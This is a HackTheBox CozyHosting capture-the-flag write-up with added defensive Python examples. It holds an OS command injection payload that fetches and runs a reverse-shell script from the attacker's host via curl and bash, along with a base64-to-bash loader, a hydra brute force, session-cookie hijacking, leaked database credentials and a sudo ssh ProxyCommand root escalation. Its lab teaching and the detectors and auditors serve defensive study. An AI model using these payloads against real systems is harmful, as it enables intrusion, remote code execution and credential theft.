HackTheBox - CozyHosting writeup

Published on by logoseq

HackTheBox CozyHosting machine image cover.
Made with ❤️ by M3riart3

Walkthrough


Summary:

In this walkthrough we will learn about the Spring Boot framework and some common endpoints that we can find with a wordlist. We'll also learn how to do an encoded OS command injection and get a reverse shell, how to do a brute-force attack to get credentials, and how to use GTFOBins for privilege escalation.

Foothold:

Following my routine, I performed an nmap scan and observed the following open ports: 22 and 80.

    22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3
    80/tcp open http nginx 1.18.0
    _http-title: Did not follow redirect to http://cozyhosting.htb

I added 10.10.11.230 cozyhosting.htb to my /etc/hosts file and then searched for a subdomain but nothing was found, while feroxbuster found:

    http://cozyhosting.htb/login
    http://cozyhosting.htb/admin
    http://cozyhosting.htb/error
              

Using hydra, I discovered the admin's password, which turned out to be manchesterunited. However, upon attempting to log in with it, I encountered a 401 Unauthorized error.

hydra found admin's password, which is manchesterunited
image of the Spring Boot error page

I began by Googling the error title, which revealed that it is the default error page of the Spring Boot framework. I then searched GitHub for a Spring Boot specific wordlist, and running feroxbuster's content discovery with it turned up the following endpoints:

    http://cozyhosting.htb/actuator/beans
    http://cozyhosting.htb/actuator/env (filename: cloudhosting-0.0.1.jar)
    http://cozyhosting.htb/actuator/health
    http://cozyhosting.htb/actuator/mappings (Tomcat WebSocket JSR356)
    http://cozyhosting.htb/actuator/sessions (json session cookie)
              

Exploitation:

The /actuator/sessions endpoint of a Spring Boot application lists active user sessions. Inspecting this page, I observed several session cookies that were not mine and identified a user named kanderson. Using kanderson's session cookie, I gained administrative access and could reach the '/admin' page.

spring boot active session page where we can see user's cookie

The /admin page has a form that takes a hostname and a username and sends them in a POST request to the '/executessh' action, which suggests that an operating system command is executed on the server. This led me to consider an OS command injection. Indeed, I successfully executed the 'id' command via the 'username' parameter, yielding the result: uid=1001(app)

/admin page where we can input hostname and username, there is the result of a command injection into username parameter

After a series of trial-and-error attempts, I discovered that injecting a command that used individual flags such as -d did not yield the desired results, as they seemed to isolate the commands from one another. Consequently, I wrote a Bash script named "revS.sh" and uploaded it to the target machine.

    #!/bin/bash
    # revS.sh: decode the base64-encoded reverse shell payload and run it
    echo base64EncodedPayload | base64 -d | bash

I saved this as revS.sh, then made it executable and served it from my machine:

    chmod +x revS.sh
    python3 -m http.server 8888

To fetch and run the script from my machine, I used the following OS command injection:

    host=127.0.0.1&username=;$(curl{IFS}$MyIP:8888/revS.sh|bash)

I used {IFS} because a WAF blocked whitespace; revS.sh is the script I created earlier.
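The following is an added example, not code from the writeup or from the CozyHosting application, written from the defender's side of the /executessh form. It shows the injectable pattern (a shell line built from the username field), a hardened replacement that allow-lists both fields and passes them as an argv list with no shell, and a detector that decodes request bodies and flags the indicators used above (`;`, `$(`, `|`, and the `${IFS}` whitespace substitute; the bare `{IFS}` form is matched too, as written in this post). The function names, the log line format and the log lines themselves are constructed for the example.

```python
# Added example (not part of the writeup): the injectable pattern behind a
# form such as /executessh, a hardened replacement, and a detector for the
# injection indicators seen above.  Function names and log lines are
# constructed for this example.
import re
import subprocess
from urllib.parse import unquote_plus


# --- Vulnerable pattern (returned as a string here, never executed) ----------
def build_vulnerable_command(host: str, username: str) -> str:
    """Interpolating raw input into a shell line is the bug: a username of
    ';$(id)' becomes 'ssh ... ;$(id)@host' and the shell runs id during
    command substitution before ssh ever starts."""
    return f"ssh -o ConnectTimeout=5 {username}@{host}"


# --- Hardened pattern --------------------------------------------------------
_HOST_RE = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252})")
_USER_RE = re.compile(r"[a-z_][a-z0-9_-]{0,31}")


def is_safe_input(host: str, username: str) -> bool:
    """Allow-list both fields: hostnames/IPs and POSIX user names only."""
    return bool(_HOST_RE.fullmatch(host) and _USER_RE.fullmatch(username))


def build_ssh_argv(host: str, username: str) -> list:
    """Validate, then build an argv list.  Each element reaches execve as one
    argument, so ';', '|', '$(' and ${IFS} carry no meaning to a shell."""
    if not is_safe_input(host, username):
        raise ValueError("host or username failed validation")
    # '--' stops ssh from reading a value as an option even if the allow-list
    # were relaxed later (ssh parses options with getopt).
    return ["ssh", "-o", "ConnectTimeout=5", "-o", "BatchMode=yes", "--", f"{username}@{host}"]


def execute_ssh(host: str, username: str) -> subprocess.CompletedProcess:
    """Run the validated command without a shell (shell=False is the default)."""
    return subprocess.run(build_ssh_argv(host, username), capture_output=True,
                          text=True, timeout=15, check=False)


# --- Detection over request logs --------------------------------------------
# Command separators, command substitution, and the IFS trick from the writeup.
# ${IFS} is the shell's Internal Field Separator; the bare {IFS} form is also
# matched because it appears in payloads exactly as written in this post.
_INJECTION_RE = re.compile(r"[;&|`]|\$\(|\$\{IFS\}|\$IFS\b|\{IFS\}")


def _parse_form(body: str) -> dict:
    """Split a urlencoded body and decode each value before inspection, so
    '%3Bid' is inspected as ';id'."""
    params = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params


def find_injection_attempts(log_lines: list) -> list:
    """Return (client, parameter, decoded value) for each suspicious value.
    Expected line shape (constructed): '<client> <method> <path> <urlencoded body>'."""
    hits = []
    for line in log_lines:
        client, _method, _path, body = line.split(" ", 3)
        for key, value in _parse_form(body).items():
            if _INJECTION_RE.search(value):
                hits.append((client, key, value))
    return hits


# Constructed log lines; the first reuses the payload shape from the writeup.
SAMPLE_LOG = [
    "10.10.14.5 POST /executessh host=127.0.0.1&username=;$(curl${IFS}10.10.14.5:8888/revS.sh|bash)",
    "10.10.14.5 POST /executessh host=10.0.0.7&username=alice",
    "10.10.14.5 POST /executessh host=127.0.0.1&username=%3Bid",
    "10.10.14.5 POST /executessh host=127.0.0.1&username=bob{IFS}x",
]

if __name__ == "__main__":
    print(build_vulnerable_command("127.0.0.1", ";$(id)"))
    print(build_ssh_argv("10.0.0.7", "alice"))
    for hit in find_injection_attempts(SAMPLE_LOG):
        print("injection attempt:", hit)
```

The allow-list is the primary control and the argv list is the backstop: even if a value slipped past the regex, nothing in it is ever parsed by a shell. The detector decodes before matching because a WAF that only looks at raw bytes misses `%3B` for `;` and `${IFS}` for a space.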

...

System Enumeration:

I retrieved the file /app/cloudhosting-0.0.1.jar and then employed the unzip command for extraction. This decision was based on information I stumbled upon within a random forum discussion concerning .jar files.

"There's nothing magical about a .jar file. It's just a .zip file with a different extension."

set up a python3 http server on the machine and got the source code of /app/cloudhosting-0.0.1.jar

I discovered that the server was running a PostgreSQL database on the default port 5432, and I obtained the credentials for the "postgres" user. This valuable information was located within the '/BOOT-INF/classes/application.properties' file.

postgresql credentials from /app/cloudhosting-0.0.1.jar file

    spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
    spring.datasource.username=postgres
    spring.datasource.password=Vg&nvzAQ7XxR
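
The following is an added example, not part of the writeup or of the application's code, that audits a Spring Boot application.properties for the two weaknesses this box combined: Actuator endpoints such as /actuator/env and /actuator/sessions reachable over HTTP (the endpoint list above) and a database password stored in clear text (the file above). The property texts are constructed, with a fake password; the key names (`management.endpoints.web.exposure.include`, `spring.datasource.*`) are real Spring Boot keys.

```python
# Added example (not part of the writeup): audit a Spring Boot
# application.properties for the two weaknesses this box exposed, Actuator
# endpoints reachable over HTTP and a database password in clear text.  The
# property texts are constructed; the key names are real Spring Boot keys.
import re

# Actuator endpoints whose output leaks configuration, secrets or session ids.
SENSITIVE_ACTUATORS = {"env", "beans", "mappings", "sessions", "configprops", "heapdump"}
# A value such as ${DB_PASSWORD} is resolved from the environment at start-up,
# so the secret itself is not in the file.
_PLACEHOLDER_RE = re.compile(r"\$\{[A-Za-z0-9_.:-]+\}")


def parse_properties(text: str) -> dict:
    """Minimal .properties reader: key=value lines, '#' and '!' comments."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#!":
            continue
        key, _, value = line.partition("=")
        props[key.strip()] = value.strip()
    return props


def audit_properties(text: str) -> list:
    """Return human-readable findings; an empty list means nothing flagged."""
    props = parse_properties(text)
    findings = []
    # Only 'health' is exposed over HTTP when the key is absent (Spring Boot 2.6+).
    exposed = props.get("management.endpoints.web.exposure.include", "health")
    names = {n.strip() for n in exposed.split(",") if n.strip()}
    if "*" in names:
        findings.append("every Actuator endpoint is exposed over HTTP (exposure.include=*)")
    else:
        for name in sorted(names & SENSITIVE_ACTUATORS):
            findings.append(f"sensitive Actuator endpoint exposed: /actuator/{name}")
    for key, value in props.items():
        if key.endswith((".password", ".secret")) and value and not _PLACEHOLDER_RE.fullmatch(value):
            findings.append(f"clear-text secret in {key}")
    return findings


# Constructed samples.  WEAK mirrors the shape found in the jar, with a fake password.
WEAK_PROPERTIES = """
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=EXAMPLE-NOT-THE-REAL-PASSWORD
management.endpoints.web.exposure.include=*
"""

FIXED_PROPERTIES = """
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
# injected from the environment or a secrets manager, never committed
spring.datasource.password=${DB_PASSWORD}
management.endpoints.web.exposure.include=health
"""

if __name__ == "__main__":
    for label, text in (("weak", WEAK_PROPERTIES), ("fixed", FIXED_PROPERTIES)):
        print(label, audit_properties(text) or "no findings")
```

Restricting `exposure.include` is not a substitute for authentication: the remaining Actuator paths should still sit behind Spring Security, or be moved off the public listener with `management.server.address=127.0.0.1`, so that a session listing like the one used above is never reachable by an anonymous client.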
            

After some time I remembered that at the beginning I had found the admin's password, which had been useless so far, so I tried it to log in as josh, and it worked!

System Exploitation:

I ran:

    josh@cozyhosting:~$ sudo -l
    User josh may run the following commands on localhost:
    (root) /usr/bin/ssh *            
            
GTFOBins showed me how to exploit the /usr/bin/ssh command, it was pretty simple. I ran this command:

    sudo /usr/bin/ssh -o ProxyCommand=';sh 0<&2 1>&2' x
            
It worked! I became root and got the flag.
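The following is an added example, not part of the writeup, that checks `sudo -l` output for the rule shape that gave root here. In sudoers, a command listed with no arguments or with a `*` argument may be run with any arguments, and ssh's ProxyCommand option (used above) runs whatever command it is given, so `(root) /usr/bin/ssh *` is a root shell. The rule texts, the restricted "fixed" rule and the `backup.example.internal` host are constructed; the `SHELL_CAPABLE` table is an assumption seeded only with the binary this post uses.

```python
# Added example (not part of the writeup): flag `sudo -l` rules shaped like the
# one that gave root here.  In sudoers, a command with no arguments listed or
# with a '*' argument may be run with any arguments, and ssh can run a command
# through its own ProxyCommand option, so '(root) /usr/bin/ssh *' is a root
# shell.  The rule texts below are constructed.
import re
import shlex

# Binaries that execute a caller-supplied command via one of their options;
# ssh is the case from this post (assumed table, extend as needed).
SHELL_CAPABLE = {"/usr/bin/ssh": "ProxyCommand=<command>"}

_RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")


def parse_sudo_rule(line: str):
    """Parse one '(runas) [TAG:] command [args]' line from `sudo -l` output."""
    m = _RULE_RE.match(line.strip())
    if not m:
        return None
    argv = shlex.split(m.group("cmd"))
    if not argv:
        return None
    tags = {t.rstrip(":") for t in m.group("tags").split()}
    return {"runas": m.group("runas").strip(), "tags": tags,
            "binary": argv[0], "args": argv[1:]}


def audit_sudo_rule(line: str) -> list:
    """Return findings for one rule; an empty list means the rule looks tight."""
    rule = parse_sudo_rule(line)
    if rule is None:
        return [f"could not parse rule: {line!r}"]
    binary, runas = rule["binary"], rule["runas"]
    if binary == "ALL":
        return [f"ALL: any command runs as {runas}"]
    findings = []
    # No args listed => any args allowed; "" => no args allowed; '*' => wildcard.
    unrestricted = not rule["args"] or any("*" in a for a in rule["args"])
    if unrestricted and binary in SHELL_CAPABLE:
        findings.append(f"root shell: {binary} runs as {runas} with arbitrary "
                        f"arguments and can execute a command via {SHELL_CAPABLE[binary]}")
    elif unrestricted:
        findings.append(f"unrestricted arguments: {binary} runs as {runas}; "
                        "review its options for command execution")
    if "NOPASSWD" in rule["tags"]:
        findings.append(f"NOPASSWD: {binary} runs without the user's password")
    return findings


def audit_sudo_output(text: str) -> list:
    """Audit every rule line in `sudo -l` output, skipping the header lines."""
    findings = []
    for line in text.splitlines():
        if line.strip().startswith("("):
            findings.extend(audit_sudo_rule(line))
    return findings


# Constructed `sudo -l` output: the rule from this box plus a restricted one
# that pins every argument, which is the remediation shape.
SAMPLE_SUDO_L = """
User josh may run the following commands on localhost:
    (root) /usr/bin/ssh *
    (root) NOPASSWD: /usr/bin/ssh -i /root/.ssh/backup_key backup@backup.example.internal
"""

if __name__ == "__main__":
    for finding in audit_sudo_output(SAMPLE_SUDO_L):
        print(finding)
```

The remediation is not to remove the wildcard alone but to list the exact arguments the user needs (sudoers matches listed arguments exactly), or to wrap the task in a dedicated script that takes no arguments and grant sudo on that.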

Writeup learnings:

This lab provided a valuable learning experience, and I'm delighted with the knowledge I gained throughout the process. I learned about the clever use of {IFS} (Internal Field Separator) for word splitting, which let me bypass a basic Web Application Firewall (WAF). Additionally, I deepened my understanding of OS command injection and its exploitation. I became proficient in using psql, and in using unzip to retrieve the source code from a .jar file.